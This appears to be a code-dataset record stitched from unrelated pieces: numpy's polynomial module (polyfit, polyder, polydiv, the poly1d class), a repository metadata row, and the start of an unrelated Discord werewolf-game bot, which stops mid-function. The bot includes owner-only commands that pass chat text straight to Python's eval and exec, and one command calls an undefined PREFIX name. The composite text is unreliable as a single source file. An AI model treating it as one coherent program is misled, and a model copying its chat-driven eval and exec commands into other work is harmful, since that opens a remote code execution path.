atleast_1d(k) if len(k) == 1 and m > 1: k = k[0]*NX.ones(m, float) if len(k) < m: raise ValueError( "k must be a scalar or a rank-1 array of length 1 or >m.") truepoly = isinstance(p, poly1d) p = NX.asarray(p) if m == 0: if truepoly: return poly1d(p) return p else: # Note: this must work also with object and integer arrays y = NX.concatenate((p.__truediv__(NX.arange(len(p), 0, -1)), [k[0]])) val = polyint(y, m - 1, k=k[1:]) if truepoly: return poly1d(val) return val def polyder(p, m=1): """ Return the derivative of the specified order of a polynomial. Parameters ---------- p : poly1d or sequence Polynomial to differentiate. A sequence is interpreted as polynomial coefficients, see `poly1d`. m : int, optional Order of differentiation (default: 1) Returns ------- der : poly1d A new polynomial representing the derivative. See Also -------- polyint : Anti-derivative of a polynomial. poly1d : Class for one-dimensional polynomials. Examples -------- The derivative of the polynomial :math:`x^3 + x^2 + x^1 + 1` is: >>> p = np.poly1d([1,1,1,1]) >>> p2 = np.polyder(p) >>> p2 poly1d([3, 2, 1]) which evaluates to: >>> p2(2.) 17.0 We can verify this, approximating the derivative with ``(f(x + h) - f(x))/h``: >>> (p(2. + 0.001) - p(2.)) / 0.001 17.007000999997857 The fourth-order derivative of a 3rd-order polynomial is zero: >>> np.polyder(p, 2) poly1d([6, 2]) >>> np.polyder(p, 3) poly1d([6]) >>> np.polyder(p, 4) poly1d([ 0.]) """ m = int(m) if m < 0: raise ValueError("Order of derivative must be positive (see polyint)") truepoly = isinstance(p, poly1d) p = NX.asarray(p) n = len(p) - 1 y = p[:-1] * NX.arange(n, 0, -1) if m == 0: val = p else: val = polyder(y, m - 1) if truepoly: val = poly1d(val) return val def polyfit(x, y, deg, rcond=None, full=False, w=None, cov=False): """ Least squares polynomial fit. Fit a polynomial ``p(x) = p[0] * x**deg + ... + p[deg]`` of degree `deg` to points `(x, y)`. Returns a vector of coefficients `p` that minimises the squared error. Parameters ---------- x : array_like, shape (M,) x-coordinates of the M sample points ``(x[i], y[i])``. y : array_like, shape (M,) or (M, K) y-coordinates of the sample points. Several data sets of sample points sharing the same x-coordinates can be fitted at once by passing in a 2D-array that contains one dataset per column. deg : int Degree of the fitting polynomial rcond : float, optional Relative condition number of the fit. Singular values smaller than this relative to the largest singular value will be ignored. The default value is len(x)*eps, where eps is the relative precision of the float type, about 2e-16 in most cases. full : bool, optional Switch determining nature of return value. When it is False (the default) just the coefficients are returned, when True diagnostic information from the singular value decomposition is also returned. w : array_like, shape (M,), optional Weights to apply to the y-coordinates of the sample points. For gaussian uncertainties, use 1/sigma (not 1/sigma**2). cov : bool, optional Return the estimate and the covariance matrix of the estimate If full is True, then cov is not returned. Returns ------- p : ndarray, shape (deg + 1,) or (deg + 1, K) Polynomial coefficients, highest power first. If `y` was 2-D, the coefficients for `k`-th data set are in ``p[:,k]``. residuals, rank, singular_values, rcond Present only if `full` = True. Residuals of the least-squares fit, the effective rank of the scaled Vandermonde coefficient matrix, its singular values, and the specified value of `rcond`. For more details, see `linalg.lstsq`. V : ndarray, shape (M,M) or (M,M,K) Present only if `full` = False and `cov`=True. The covariance matrix of the polynomial coefficient estimates. The diagonal of this matrix are the variance estimates for each coefficient. If y is a 2-D array, then the covariance matrix for the `k`-th data set are in ``V[:,:,k]`` Warns ----- RankWarning The rank of the coefficient matrix in the least-squares fit is deficient. The warning is only raised if `full` = False. The warnings can be turned off by >>> import warnings >>> warnings.simplefilter('ignore', np.RankWarning) See Also -------- polyval : Compute polynomial values. linalg.lstsq : Computes a least-squares fit. scipy.interpolate.UnivariateSpline : Computes spline fits. Notes ----- The solution minimizes the squared error .. math :: E = \\sum_{j=0}^k |p(x_j) - y_j|^2 in the equations:: x[0]**n * p[0] + ... + x[0] * p[n-1] + p[n] = y[0] x[1]**n * p[0] + ... + x[1] * p[n-1] + p[n] = y[1] ... x[k]**n * p[0] + ... + x[k] * p[n-1] + p[n] = y[k] The coefficient matrix of the coefficients `p` is a Vandermonde matrix. `polyfit` issues a `RankWarning` when the least-squares fit is badly conditioned. This implies that the best fit is not well-defined due to numerical error. The results may be improved by lowering the polynomial degree or by replacing `x` by `x` - `x`.mean(). The `rcond` parameter can also be set to a value smaller than its default, but the resulting fit may be spurious: including contributions from the small singular values can add numerical noise to the result. Note that fitting polynomial coefficients is inherently badly conditioned when the degree of the polynomial is large or the interval of sample points is badly centered. The quality of the fit should always be checked in these cases. When polynomial fits are not satisfactory, splines may be a good alternative. References ---------- .. [1] Wikipedia, "Curve fitting", http://en.wikipedia.org/wiki/Curve_fitting .. [2] Wikipedia, "Polynomial interpolation", http://en.wikipedia.org/wiki/Polynomial_interpolation Examples -------- >>> x = np.array([0.0, 1.0, 2.0, 3.0, 4.0, 5.0]) >>> y = np.array([0.0, 0.8, 0.9, 0.1, -0.8, -1.0]) >>> z = np.polyfit(x, y, 3) >>> z array([ 0.08703704, -0.81349206, 1.69312169, -0.03968254]) It is convenient to use `poly1d` objects for dealing with polynomials: >>> p = np.poly1d(z) >>> p(0.5) 0.6143849206349179 >>> p(3.5) -0.34732142857143039 >>> p(10) 22.579365079365115 High-order polynomials may oscillate wildly: >>> p30 = np.poly1d(np.polyfit(x, y, 30)) /... RankWarning: Polyfit may be poorly conditioned... >>> p30(4) -0.80000000000000204 >>> p30(5) -0.99999999999999445 >>> p30(4.5) -0.10547061179440398 Illustration: >>> import matplotlib.pyplot as plt >>> xp = np.linspace(-2, 6, 100) >>> _ = plt.plot(x, y, '.', xp, p(xp), '-', xp, p30(xp), '--') >>> plt.ylim(-2,2) (-2, 2) >>> plt.show() """ order = int(deg) + 1 x = NX.asarray(x) + 0.0 y = NX.asarray(y) + 0.0 # check arguments. if deg < 0: raise ValueError("expected deg >= 0") if x.ndim != 1: raise TypeError("expected 1D vector for x") if x.size == 0: raise TypeError("expected non-empty vector for x") if y.ndim < 1 or y.ndim > 2: raise TypeError("expected 1D or 2D array for y") if x.shape[0] != y.shape[0]: raise TypeError("expected x and y to have same length") # set rcond if rcond is None: rcond = len(x)*finfo(x.dtype).eps # set up least squares equation for powers of x lhs = vander(x, order) rhs = y # apply weighting if w is not None: w = NX.asarray(w) + 0.0 if w.ndim != 1: raise TypeError("expected a 1-d array for weights") if w.shape[0] != y.shape[0]: raise TypeError("expected w and y to have the same length") lhs *= w[:, NX.newaxis] if rhs.ndim == 2: rhs *= w[:, NX.newaxis] else: rhs *= w # scale lhs to improve condition number and solve scale = NX.sqrt((lhs*lhs).sum(axis=0)) lhs /= scale c, resids, rank, s = lstsq(lhs, rhs, rcond) c = (c.T/scale).T # broadcast scale coefficients # warn on rank reduction, which indicates an ill conditioned matrix if rank != order and not full: msg = "Polyfit may be poorly conditioned" warnings.warn(msg, RankWarning, stacklevel=2) if full: return c, resids, rank, s, rcond elif cov: Vbase = inv(dot(lhs.T, lhs)) Vbase /= NX.outer(scale, scale) # Some literature ignores the extra -2.0 factor in the denominator, but # it is included here because the covariance of Multivariate Student-T # (which is implied by a Bayesian uncertainty analysis) includes it. # Plus, it gives a slightly more conservative estimate of uncertainty. if len(x) <= order + 2: raise ValueError("the number of data points must exceed order + 2 " "for Bayesian estimate the covariance matrix") fac = resids / (len(x) - order - 2.0) if y.ndim == 1: return c, Vbase * fac else: return c, Vbase[:,:, NX.newaxis] * fac else: return c def polyval(p, x): """ Evaluate a polynomial at specific values. If `p` is of length N, this function returns the value: ``p[0]*x**(N-1) + p[1]*x**(N-2) + ... + p[N-2]*x + p[N-1]`` If `x` is a sequence, then `p(x)` is returned for each element of `x`. If `x` is another polynomial then the composite polynomial `p(x(t))` is returned. Parameters ---------- p : array_like or poly1d object 1D array of polynomial coefficients (including coefficients equal to zero) from highest degree to the constant term, or an instance of poly1d. x : array_like or poly1d object A number, an array of numbers, or an instance of poly1d, at which to evaluate `p`. Returns ------- values : ndarray or poly1d If `x` is a poly1d instance, the result is the composition of the two polynomials, i.e., `x` is "substituted" in `p` and the simplified result is returned. In addition, the type of `x` - array_like or poly1d - governs the type of the output: `x` array_like => `values` array_like, `x` a poly1d object => `values` is also. See Also -------- poly1d: A polynomial class. Notes ----- Horner's scheme [1]_ is used to evaluate the polynomial. Even so, for polynomials of high degree the values may be inaccurate due to rounding errors. Use carefully. References ---------- .. [1] I. N. Bronshtein, K. A. Semendyayev, and K. A. Hirsch (Eng. trans. Ed.), *Handbook of Mathematics*, New York, Van Nostrand Reinhold Co., 1985, pg. 720. Examples -------- >>> np.polyval([3,0,1], 5) # 3 * 5**2 + 0 * 5**1 + 1 76 >>> np.polyval([3,0,1], np.poly1d(5)) poly1d([ 76.]) >>> np.polyval(np.poly1d([3,0,1]), 5) 76 >>> np.polyval(np.poly1d([3,0,1]), np.poly1d(5)) poly1d([ 76.]) """ p = NX.asarray(p) if isinstance(x, poly1d): y = 0 else: x = NX.asarray(x) y = NX.zeros_like(x) for i in range(len(p)): y = y * x + p[i] return y def polyadd(a1, a2): """ Find the sum of two polynomials. Returns the polynomial resulting from the sum of two input polynomials. Each input must be either a poly1d object or a 1D sequence of polynomial coefficients, from highest to lowest degree. Parameters ---------- a1, a2 : array_like or poly1d object Input polynomials. Returns ------- out : ndarray or poly1d object The sum of the inputs. If either input is a poly1d object, then the output is also a poly1d object. Otherwise, it is a 1D array of polynomial coefficients from highest to lowest degree. See Also -------- poly1d : A one-dimensional polynomial class. poly, polyadd, polyder, polydiv, polyfit, polyint, polysub, polyval Examples -------- >>> np.polyadd([1, 2], [9, 5, 4]) array([9, 6, 6]) Using poly1d objects: >>> p1 = np.poly1d([1, 2]) >>> p2 = np.poly1d([9, 5, 4]) >>> print(p1) 1 x + 2 >>> print(p2) 2 9 x + 5 x + 4 >>> print(np.polyadd(p1, p2)) 2 9 x + 6 x + 6 """ truepoly = (isinstance(a1, poly1d) or isinstance(a2, poly1d)) a1 = atleast_1d(a1) a2 = atleast_1d(a2) diff = len(a2) - len(a1) if diff == 0: val = a1 + a2 elif diff > 0: zr = NX.zeros(diff, a1.dtype) val = NX.concatenate((zr, a1)) + a2 else: zr = NX.zeros(abs(diff), a2.dtype) val = a1 + NX.concatenate((zr, a2)) if truepoly: val = poly1d(val) return val def polysub(a1, a2): """ Difference (subtraction) of two polynomials. Given two polynomials `a1` and `a2`, returns ``a1 - a2``. `a1` and `a2` can be either array_like sequences of the polynomials' coefficients (including coefficients equal to zero), or `poly1d` objects. Parameters ---------- a1, a2 : array_like or poly1d Minuend and subtrahend polynomials, respectively. Returns ------- out : ndarray or poly1d Array or `poly1d` object of the difference polynomial's coefficients. See Also -------- polyval, polydiv, polymul, polyadd Examples -------- .. math:: (2 x^2 + 10 x - 2) - (3 x^2 + 10 x -4) = (-x^2 + 2) >>> np.polysub([2, 10, -2], [3, 10, -4]) array([-1, 0, 2]) """ truepoly = (isinstance(a1, poly1d) or isinstance(a2, poly1d)) a1 = atleast_1d(a1) a2 = atleast_1d(a2) diff = len(a2) - len(a1) if diff == 0: val = a1 - a2 elif diff > 0: zr = NX.zeros(diff, a1.dtype) val = NX.concatenate((zr, a1)) - a2 else: zr = NX.zeros(abs(diff), a2.dtype) val = a1 - NX.concatenate((zr, a2)) if truepoly: val = poly1d(val) return val def polymul(a1, a2): """ Find the product of two polynomials. Finds the polynomial resulting from the multiplication of the two input polynomials. Each input must be either a poly1d object or a 1D sequence of polynomial coefficients, from highest to lowest degree. Parameters ---------- a1, a2 : array_like or poly1d object Input polynomials. Returns ------- out : ndarray or poly1d object The polynomial resulting from the multiplication of the inputs. If either inputs is a poly1d object, then the output is also a poly1d object. Otherwise, it is a 1D array of polynomial coefficients from highest to lowest degree. See Also -------- poly1d : A one-dimensional polynomial class. poly, polyadd, polyder, polydiv, polyfit, polyint, polysub, polyval convolve : Array convolution. Same output as polymul, but has parameter for overlap mode. Examples -------- >>> np.polymul([1, 2, 3], [9, 5, 1]) array([ 9, 23, 38, 17, 3]) Using poly1d objects: >>> p1 = np.poly1d([1, 2, 3]) >>> p2 = np.poly1d([9, 5, 1]) >>> print(p1) 2 1 x + 2 x + 3 >>> print(p2) 2 9 x + 5 x + 1 >>> print(np.polymul(p1, p2)) 4 3 2 9 x + 23 x + 38 x + 17 x + 3 """ truepoly = (isinstance(a1, poly1d) or isinstance(a2, poly1d)) a1, a2 = poly1d(a1), poly1d(a2) val = NX.convolve(a1, a2) if truepoly: val = poly1d(val) return val def polydiv(u, v): """ Returns the quotient and remainder of polynomial division. The input arrays are the coefficients (including any coefficients equal to zero) of the "numerator" (dividend) and "denominator" (divisor) polynomials, respectively. Parameters ---------- u : array_like or poly1d Dividend polynomial's coefficients. v : array_like or poly1d Divisor polynomial's coefficients. Returns ------- q : ndarray Coefficients, including those equal to zero, of the quotient. r : ndarray Coefficients, including those equal to zero, of the remainder. See Also -------- poly, polyadd, polyder, polydiv, polyfit, polyint, polymul, polysub, polyval Notes ----- Both `u` and `v` must be 0-d or 1-d (ndim = 0 or 1), but `u.ndim` need not equal `v.ndim`. In other words, all four possible combinations - ``u.ndim = v.ndim = 0``, ``u.ndim = v.ndim = 1``, ``u.ndim = 1, v.ndim = 0``, and ``u.ndim = 0, v.ndim = 1`` - work. Examples -------- .. math:: \\frac{3x^2 + 5x + 2}{2x + 1} = 1.5x + 1.75, remainder 0.25 >>> x = np.array([3.0, 5.0, 2.0]) >>> y = np.array([2.0, 1.0]) >>> np.polydiv(x, y) (array([ 1.5 , 1.75]), array([ 0.25])) """ truepoly = (isinstance(u, poly1d) or isinstance(u, poly1d)) u = atleast_1d(u) + 0.0 v = atleast_1d(v) + 0.0 # w has the common type w = u[0] + v[0] m = len(u) - 1 n = len(v) - 1 scale = 1. / v[0] q = NX.zeros((max(m - n + 1, 1),), w.dtype) r = u.copy() for k in range(0, m-n+1): d = scale * r[k] q[k] = d r[k:k+n+1] -= d*v while NX.allclose(r[0], 0, rtol=1e-14) and (r.shape[-1] > 1): r = r[1:] if truepoly: return poly1d(q), poly1d(r) return q, r _poly_mat = re.compile(r"[*][*]([0-9]*)") def _raise_power(astr, wrap=70): n = 0 line1 = '' line2 = '' output = ' ' while True: mat = _poly_mat.search(astr, n) if mat is None: break span = mat.span() power = mat.groups()[0] partstr = astr[n:span[0]] n = span[1] toadd2 = partstr + ' '*(len(power)-1) toadd1 = ' '*(len(partstr)-1) + power if ((len(line2) + len(toadd2) > wrap) or (len(line1) + len(toadd1) > wrap)): output += line1 + "\n" + line2 + "\n " line1 = toadd1 line2 = toadd2 else: line2 += partstr + ' '*(len(power)-1) line1 += ' '*(len(partstr)-1) + power output += line1 + "\n" + line2 return output + astr[n:] class poly1d(object): """ A one-dimensional polynomial class. A convenience class, used to encapsulate "natural" operations on polynomials so that said operations may take on their customary form in code (see Examples). Parameters ---------- c_or_r : array_like The polynomial's coefficients, in decreasing powers, or if the value of the second parameter is True, the polynomial's roots (values where the polynomial evaluates to 0). For example, ``poly1d([1, 2, 3])`` returns an object that represents :math:`x^2 + 2x + 3`, whereas ``poly1d([1, 2, 3], True)`` returns one that represents :math:`(x-1)(x-2)(x-3) = x^3 - 6x^2 + 11x -6`. r : bool, optional If True, `c_or_r` specifies the polynomial's roots; the default is False. variable : str, optional Changes the variable used when printing `p` from `x` to `variable` (see Examples). Examples -------- Construct the polynomial :math:`x^2 + 2x + 3`: >>> p = np.poly1d([1, 2, 3]) >>> print(np.poly1d(p)) 2 1 x + 2 x + 3 Evaluate the polynomial at :math:`x = 0.5`: >>> p(0.5) 4.25 Find the roots: >>> p.r array([-1.+1.41421356j, -1.-1.41421356j]) >>> p(p.r) array([ -4.44089210e-16+0.j, -4.44089210e-16+0.j]) These numbers in the previous line represent (0, 0) to machine precision Show the coefficients: >>> p.c array([1, 2, 3]) Display the order (the leading zero-coefficients are removed): >>> p.order 2 Show the coefficient of the k-th power in the polynomial (which is equivalent to ``p.c[-(i+1)]``): >>> p[1] 2 Polynomials can be added, subtracted, multiplied, and divided (returns quotient and remainder): >>> p * p poly1d([ 1, 4, 10, 12, 9]) >>> (p**3 + 4) / p (poly1d([ 1., 4., 10., 12., 9.]), poly1d([ 4.])) ``asarray(p)`` gives the coefficient array, so polynomials can be used in all functions that accept arrays: >>> p**2 # square of polynomial poly1d([ 1, 4, 10, 12, 9]) >>> np.square(p) # square of individual coefficients array([1, 4, 9]) The variable used in the string representation of `p` can be modified, using the `variable` parameter: >>> p = np.poly1d([1,2,3], variable='z') >>> print(p) 2 1 z + 2 z + 3 Construct a polynomial from its roots: >>> np.poly1d([1, 2], True) poly1d([ 1, -3, 2]) This is the same polynomial as obtained by: >>> np.poly1d([1, -1]) * np.poly1d([1, -2]) poly1d([ 1, -3, 2]) """ coeffs = None order = None variable = None __hash__ = None def __init__(self, c_or_r, r=0, variable=None): if isinstance(c_or_r, poly1d): for key in c_or_r.__dict__.keys(): self.__dict__[key] = c_or_r.__dict__[key] if variable is not None: self.__dict__['variable'] = variable return if r: c_or_r = poly(c_or_r) c_or_r = atleast_1d(c_or_r) if len(c_or_r.shape) > 1: raise ValueError("Polynomial must be 1d only.") c_or_r = trim_zeros(c_or_r, trim='f') if len(c_or_r) == 0: c_or_r = NX.array([0.]) self.__dict__['coeffs'] = c_or_r self.__dict__['order'] = len(c_or_r) - 1 if variable is None: variable = 'x' self.__dict__['variable'] = variable def __array__(self, t=None): if t: return NX.asarray(self.coeffs, t) else: return NX.asarray(self.coeffs) def __repr__(self): vals = repr(self.coeffs) vals = vals[6:-1] return "poly1d(%s)" % vals def __len__(self): return self.order def __str__(self): thestr = "0" var = self.variable # Remove leading zeros coeffs = self.coeffs[NX.logical_or.accumulate(self.coeffs != 0)] N = len(coeffs)-1 def fmt_float(q): s = '%.4g' % q if s.endswith('.0000'): s = s[:-5] return s for k in range(len(coeffs)): if not iscomplex(coeffs[k]): coefstr = fmt_float(real(coeffs[k])) elif real(coeffs[k]) == 0: coefstr = '%sj' % fmt_float(imag(coeffs[k])) else: coefstr = '(%s + %sj)' % (fmt_float(real(coeffs[k])), fmt_float(imag(coeffs[k]))) power = (N-k) if power == 0: if coefstr != '0': newstr = '%s' % (coefstr,) else: if k == 0: newstr = '0' else: newstr = '' elif power == 1: if coefstr == '0': newstr = '' elif coefstr == 'b': newstr = var else: newstr = '%s %s' % (coefstr, var) else: if coefstr == '0': newstr = '' elif coefstr == 'b': newstr = '%s**%d' % (var, power,) else: newstr = '%s %s**%d' % (coefstr, var, power) if k > 0: if newstr != '': if newstr.startswith('-'): thestr = "%s - %s" % (thestr, newstr[1:]) else: thestr = "%s + %s" % (thestr, newstr) else: thestr = newstr return _raise_power(thestr) def __call__(self, val): return polyval(self.coeffs, val) def __neg__(self): return poly1d(-self.coeffs) def __pos__(self): return self def __mul__(self, other): if isscalar(other): return poly1d(self.coeffs * other) else: other = poly1d(other) return poly1d(polymul(self.coeffs, other.coeffs)) def __rmul__(self, other): if isscalar(other): return poly1d(other * self.coeffs) else: other = poly1d(other) return poly1d(polymul(self.coeffs, other.coeffs)) def __add__(self, other): other = poly1d(other) return poly1d(polyadd(self.coeffs, other.coeffs)) def __radd__(self, other): other = poly1d(other) return poly1d(polyadd(self.coeffs, other.coeffs)) def __pow__(self, val): if not isscalar(val) or int(val) != val or val < 0: raise ValueError("Power to non-negative integers only.") res = [1] for _ in range(val): res = polymul(self.coeffs, res) return poly1d(res) def __sub__(self, other): other = poly1d(other) return poly1d(polysub(self.coeffs, other.coeffs)) def __rsub__(self, other): other = poly1d(other) return poly1d(polysub(other.coeffs, self.coeffs)) def __div__(self, other): if isscalar(other): return poly1d(self.coeffs/other) else: other = poly1d(other) return polydiv(self, other) __truediv__ = __div__ def __rdiv__(self, other): if isscalar(other): return poly1d(other/self.coeffs) else: other = poly1d(other) return polydiv(other, self) __rtruediv__ = __rdiv__ def __eq__(self, other): if self.coeffs.shape != other.coeffs.shape: return False return (self.coeffs == other.coeffs).all() def __ne__(self, other): return not self.__eq__(other) def __setattr__(self, key, val): raise ValueError("Attributes cannot be changed this way.") def __getattr__(self, key): if key in ['r', 'roots']: return roots(self.coeffs) elif key in ['c', 'coef', 'coefficients']: return self.coeffs elif key in ['o']: return self.order else: try: return self.__dict__[key] except KeyError: raise AttributeError( "'%s' has no attribute '%s'" % (self.__class__, key)) def __getitem__(self, val): ind = self.order - val if val > self.order: return 0 if val < 0: return 0 return self.coeffs[ind] def __setitem__(self, key, val): ind = self.order - key if key < 0: raise ValueError("Does not support negative powers.") if key > self.order: zr = NX.zeros(key-self.order, self.coeffs.dtype) self.__dict__['coeffs'] = NX.concatenate((zr, self.coeffs)) self.__dict__['order'] = key ind = 0 self.__dict__['coeffs'][ind] = val return def __iter__(self): return iter(self.coeffs) def integ(self, m=1, k=0): """ Return an antiderivative (indefinite integral) of this polynomial. Refer to `polyint` for full documentation. See Also -------- polyint : equivalent function """ return poly1d(polyint(self.coeffs, m=m, k=k)) def deriv(self, m=1): """ Return a derivative of this polynomial. Refer to `polyder` for full documentation. See Also -------- polyder : equivalent function """ return poly1d(polyder(self.coeffs, m=m)) # Stuff to do on module import warnings.simplefilter('always', RankWarning)
AustereCuriosity/numpy
numpy/lib/polynomial.py
Python
bsd-3-clause
37,980
[ "Gaussian" ]
822aaa1cbbda9d8c530778bd25b5818a7bab547209d954a48137371cabf8abed
import discord import asyncio import aiohttp import os import random import traceback import sys from datetime import datetime, timedelta from io import BytesIO, StringIO from config import * from settings import * import json import urllib.request ################## START INIT ##################### client = discord.Client() # [playing?, {players dict}, day?, [night start, day start], [night elapsed, day elapsed], first join, gamemode, {original roles amount}] session = [False, {}, False, [0, 0], [timedelta(0), timedelta(0)], 0, '', {}] PLAYERS_ROLE = None ADMINS_ROLE = None WEREWOLF_NOTIFY_ROLE = None ratelimit_dict = {} pingif_dict = {} notify_me = [] stasis = {} commands = {} faftergame = None starttime = datetime.now() with open(NOTIFY_FILE, 'a+') as notify_file: notify_file.seek(0) notify_me = notify_file.read().split(',') if os.path.isfile(STASIS_FILE): with open(STASIS_FILE, 'r') as stasis_file: stasis = json.load(stasis_file) else: with open(STASIS_FILE, 'a+') as stasis_file: stasis_file.write('{}') random.seed(datetime.now()) def get_jsonparsed_data(url): try: response = urllib.request.urlopen(url) except urllib.error.HTTPError: return None, None # url does not exist data = response.read().decode("utf-8") return json.loads(data), data def load_language(language): file = 'lang/{}.json'.format(language) if not os.path.isfile(file): file = 'lang/en.json' print("Could not find language file {}.json, fallback on en.json".format(language)) with open(file, 'r', encoding='utf-8') as f: return json.load(f) lang = load_language(MESSAGE_LANGUAGE) def cmd(name, perms, description, *aliases): def real_decorator(func): commands[name] = [func, perms, description.format(BOT_PREFIX)] for alias in aliases: if alias not in commands: commands[alias] = [func, perms, "```\nAlias for {0}{1}.```".format(BOT_PREFIX, name)] else: print("ERROR: Cannot assign alias {0} to command {1} since it is already the name of a command!".format(alias, name)) return func return real_decorator ################### END INIT ###################### @client.event async def on_ready(): print('Logged in as') print(client.user.name) print(client.user.id) print('------') await log(1, 'on_ready triggered!') # [playing : True | False, players : {player id : [alive, role, action, template, other]}, day?, [datetime night, datetime day], [elapsed night, elapsed day], first join time, gamemode] for role in client.get_server(WEREWOLF_SERVER).role_hierarchy: if role.name == PLAYERS_ROLE_NAME: global PLAYERS_ROLE PLAYERS_ROLE = role if role.name == ADMINS_ROLE_NAME: global ADMINS_ROLE ADMINS_ROLE = role if role.name == WEREWOLF_NOTIFY_ROLE_NAME: global WEREWOLF_NOTIFY_ROLE WEREWOLF_NOTIFY_ROLE = role if PLAYERS_ROLE: await log(0, "Players role id: " + PLAYERS_ROLE.id) else: await log(3, "Could not find players role " + PLAYERS_ROLE_NAME) if ADMINS_ROLE: await log(0, "Admins role id: " + ADMINS_ROLE.id) else: await log(3, "Could not find admins role " + ADMINS_ROLE_NAME) if WEREWOLF_NOTIFY_ROLE: await log(0, "Werewolf Notify role id: " + WEREWOLF_NOTIFY_ROLE.id) else: await log(2, "Could not find Werewolf Notify role " + WEREWOLF_NOTIFY_ROLE_NAME) if PLAYING_MESSAGE: await client.change_presence(status=discord.Status.online, game=discord.Game(name=PLAYING_MESSAGE)) @client.event async def on_resume(): print("RESUMED") await log(1, "on_resume triggered!") @client.event async def on_message(message): if message.author.id in [client.user.id] + IGNORE_LIST or not client.get_server(WEREWOLF_SERVER).get_member(message.author.id): if not (message.author.id in ADMINS or message.author.id == OWNER_ID): return if await rate_limit(message): return if message.channel.is_private: await log(0, 'pm from ' + message.author.name + ' (' + message.author.id + '): ' + message.content) if session[0] and message.author.id in session[1]: if session[1][message.author.id][1] in WOLFCHAT_ROLES and session[1][message.author.id][0]: if not message.content.strip().startswith(BOT_PREFIX): await wolfchat(message) if message.content.strip().startswith(BOT_PREFIX): # command command = message.content.strip()[len(BOT_PREFIX):].lower().split(' ')[0] parameters = ' '.join(message.content.strip().lower().split(' ')[1:]) if has_privileges(1, message) or message.channel.id == GAME_CHANNEL or message.channel.is_private: await parse_command(command, message, parameters) elif message.channel.is_private: command = message.content.strip().lower().split(' ')[0] parameters = ' '.join(message.content.strip().lower().split(' ')[1:]) await parse_command(command, message, parameters) ############# COMMANDS ############# @cmd('shutdown', [2, 2], "```\n{0}shutdown takes no arguments\n\nShuts down the bot. Owner-only.```") async def cmd_shutdown(message, parameters): if parameters.startswith("-fstop"): await cmd_fstop(message, "-force") elif parameters.startswith("-stop"): await cmd_fstop(message, parameters[len("-stop"):]) elif parameters.startswith("-fleave"): await cmd_fleave(message, 'all') await reply(message, "Shutting down...") await client.logout() @cmd('ping', [0, 0], "```\n{0}ping takes no arguments\n\nTests the bot\'s responsiveness.```") async def cmd_ping(message, parameters): msg = random.choice(lang['ping']).format( bot_nick=client.user.display_name, author=message.author.name, p=BOT_PREFIX) await reply(message, msg) @cmd('eval', [2, 2], "```\n{0}eval <evaluation string>\n\nEvaluates <evaluation string> using Python\'s eval() function and returns a result. Owner-only.```") async def cmd_eval(message, parameters): output = None parameters = ' '.join(message.content.split(' ')[1:]) if parameters == '': await reply(message, commands['eval'][2].format(BOT_PREFIX)) return try: output = eval(parameters) except: await reply(message, '```\n' + str(traceback.format_exc()) + '\n```') traceback.print_exc() return if asyncio.iscoroutine(output): output = await output await reply(message, '```py\n' + str(output) + '\n```') @cmd('exec', [2, 2], "```\n{0}exec <exec string>\n\nExecutes <exec string> using Python\'s exec() function. Owner-only.```") async def cmd_exec(message, parameters): parameters = ' '.join(message.content.split(' ')[1:]) if parameters == '': await reply(message, commands['exec'][2].format(BOT_PREFIX)) return old_stdout = sys.stdout redirected_output = sys.stdout = StringIO() try: exec(parameters) except Exception: await reply(message, '```py\n{}\n```'.format(traceback.format_exc())) return finally: sys.stdout = old_stdout output = str(redirected_output.getvalue()) if output == '': output = ":thumbsup:" await client.send_message(message.channel, output) @cmd('async', [2, 2], "```\n{0}async <code>\n\nExecutes <code> as a coroutine.```") async def cmd_async(message, parameters, recursion=0): if parameters == '': await reply(message, commands['async'][2].format(PREFIX)) return env = {'message' : message, 'parameters' : parameters, 'recursion' : recursion, 'client' : client, 'channel' : message.channel, 'author' : message.author, 'server' : message.server} env.update(globals()) old_stdout = sys.stdout redirected_output = sys.stdout = StringIO() result = None exec_string = "async def _temp_exec():\n" exec_string += '\n'.join(' ' * 4 + line for line in parameters.split('\n')) try: exec(exec_string, env) except Exception: traceback.print_exc() result = traceback.format_exc() else: _temp_exec = env['_temp_exec'] try: returnval = await _temp_exec() value = redirected_output.getvalue() if returnval == None: result = value else: result = value + '\n' + str(returnval) except Exception: traceback.print_exc() result = traceback.format_exc() finally: sys.stdout = old_stdout await client.send_message(message.channel, "```py\n{}\n```".format(result)) @cmd('help', [0, 0], "```\n{0}help <command>\n\nCho biết thông tin về <command>. Try {0}list for a listing of commands.```") async def cmd_help(message, parameters): if parameters == '': parameters = 'help' if parameters in commands: await reply(message, commands[parameters][2].format(BOT_PREFIX)) else: await reply(message, 'No help found for command ' + parameters) @cmd('list', [0, 0], "```\n{0}list không cần thêm cú pháp\n\nHiển thị danh sách lệnh. Thử {0}help <command> để biết chi tiết về 1 lệnh.```") async def cmd_list(message, parameters): cmdlist = [] for key in commands: if message.channel.is_private: if has_privileges(commands[key][1][1], message): cmdlist.append(key) else: if has_privileges(commands[key][1][0], message): cmdlist.append(key) await reply(message, "Available commands: {}".format(", ".join(sorted(cmdlist)))) @cmd('join', [0, 1], "```\n{0}join [<gamemode>]\n\nTham gia trò chơi nếu chưa bắt đầu. Vote cho [<gamemode>] nếu được hỏi.```", 'j') async def cmd_join(message, parameters): if session[0]: return if message.author.id in stasis and stasis[message.author.id] > 0: await reply(message, "You are in stasis for **{}** game{}. Please do not break rules, idle out or use !leave during a game.".format( stasis[message.author.id], '' if stasis[message.author.id] == 1 else 's')) return if len(session[1]) >= MAX_PLAYERS: await reply(message, random.choice(lang['maxplayers']).format(MAX_PLAYERS)) return if message.author.id in session[1]: await reply(message, random.choice(lang['alreadyin']).format(message.author.name)) else: session[1][message.author.id] = [True, '', '', [], []] if len(session[1]) == 1: client.loop.create_task(game_start_timeout_loop()) await client.change_presence(game=client.get_server(WEREWOLF_SERVER).me.game, status=discord.Status.idle) await client.send_message(client.get_channel(GAME_CHANNEL), random.choice(lang['gamestart']).format( message.author.name, p=BOT_PREFIX)) else: await client.send_message(message.channel, "**{}** tham gia và tăng số người chơi lên **{}**.".format( message.author.name, len(session[1]))) if parameters: await cmd_vote(message, parameters) # alive, role, action, [templates], [other] await client.add_roles(client.get_server(WEREWOLF_SERVER).get_member(message.author.id), PLAYERS_ROLE) await player_idle(message) @cmd('leave', [0, 1], "```\n{0}leave không cần thêm cú pháp\n\nRời game đang chơi. Nếu thực sự cần rời thì hãy rời trước khi game bắt đầu chơi.```", 'q') async def cmd_leave(message, parameters): if session[0] and message.author.id in list(session[1]) and session[1][message.author.id][0]: session[1][message.author.id][0] = False await 